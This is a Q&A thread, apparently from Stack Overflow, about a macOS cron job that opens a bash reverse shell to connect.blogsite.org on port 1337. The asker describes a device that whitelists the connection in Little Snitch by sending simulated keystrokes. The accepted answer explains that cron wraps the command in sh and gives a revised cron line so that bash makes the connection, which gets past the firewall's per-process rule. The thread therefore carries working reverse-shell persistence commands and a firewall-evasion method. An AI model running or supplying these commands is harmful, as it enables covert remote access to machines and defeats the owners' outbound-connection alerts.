# OS X: cron job invokes bash but process run is 'sh'

Tags: macos, bash, cron, sh

I'm working on a pentesting project in which I want to open a reverse shell. I have a device that can trigger Little Snitch and then set it to allow outbound connections for certain processes. It does this by issuing a reverse shell command and, when the LS window pops up, acts as a keyboard to tell LS to always allow this type of connection. I can successfully do this for Bash, Perl, Python and Curl. The device also installs a cron job which contains a one-line reverse shell using bash.

But here's the problem...

The first time the cron job runs, Little Snitch still gets triggered because it has seen an outbound connection from 'sh' - not 'bash'. Yet the command definitely calls bash. The cron job is:

```
*/5 * * * * /bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &
```

Subsequent connections are either from bash or sh - I haven't yet detected a pattern.

I've tried triggering LS in the original setup by using /bin/sh, but at that stage it still gets interpreted (ie, is seen by LS) as bash, not sh (as, in OS X, they as essentially the same thing but with slightly different behaviours depending on how invoked).

Any thoughts about how I can stop OS X using sh rather than bash in the cron job. Or, alternatively, how I can invoke sh rather than bash? (Like I said, /bin/sh doesn't do it!).

Comment: I haven't tried this on OSX but maybe try adding `SHELL=/bin/bash` as the first line of your crontab.

Comment: Hmm, tried that, didn't work. There's seems to be more than one process getting invoked. I tried just now setting up the cron job manually and Little Snitch was triggered twice - first 'sh' then 'bash'.

Comment: Maybe you will have to go Apple's preferred way and use `launchctl/launchd`...

Answer (score 4, accepted):

The command string is `/bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &`. Cron needs to invoke this command. It doesn't parse the command string itself to learn that the first "word" is `/bin/bash` and then execute `/bin/bash`, passing it the rest of the arguments. (Among other things, not all parts of the command are arguments.)

Instead, it invokes `/bin/sh` with a first argument of `-c` and the second argument being your command string. That's just the generic way to run a command string.

Then, `/bin/sh` interprets the command string. Part of the command is redirection. This is not done by the program that the command launches. It is done by the shell which will launch that program. That is, the instance of `/bin/sh` has to set up the file descriptors for the child process it's going to launch prior to launching that child process.

So, `/bin/sh` opens `/dev/tcp/connect.blogsite.org/1337`. It then passes the file descriptor to the child process it launches as descriptors 0 and 1. (It could do this using `fork()` and `dup2()` before `execve()` or it could do it all using `posix_spawn()` with appropriate file actions.)

The ultimate `/bin/bash` process doesn't open its own input or output. It just inherits them and, presumably, goes on to use them.

You could fix this by using yet another level of indirection in your command string. Basically, invoke `/bin/bash` with `-c` and its own command string. Like so:

```
*/5 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/connect.blogsite.org/1337 0>&1 &'
```

So, the initial instance of `/bin/sh` won't open the file. It will simply spawn an instance of `/bin/bash` with arguments `-c` and the command string. That first instance of `/bin/bash` will interpret the command string, open the file in order to carry out the redirection directives, and then spawn a second instance of `/bin/bash` which will inherit those file descriptors.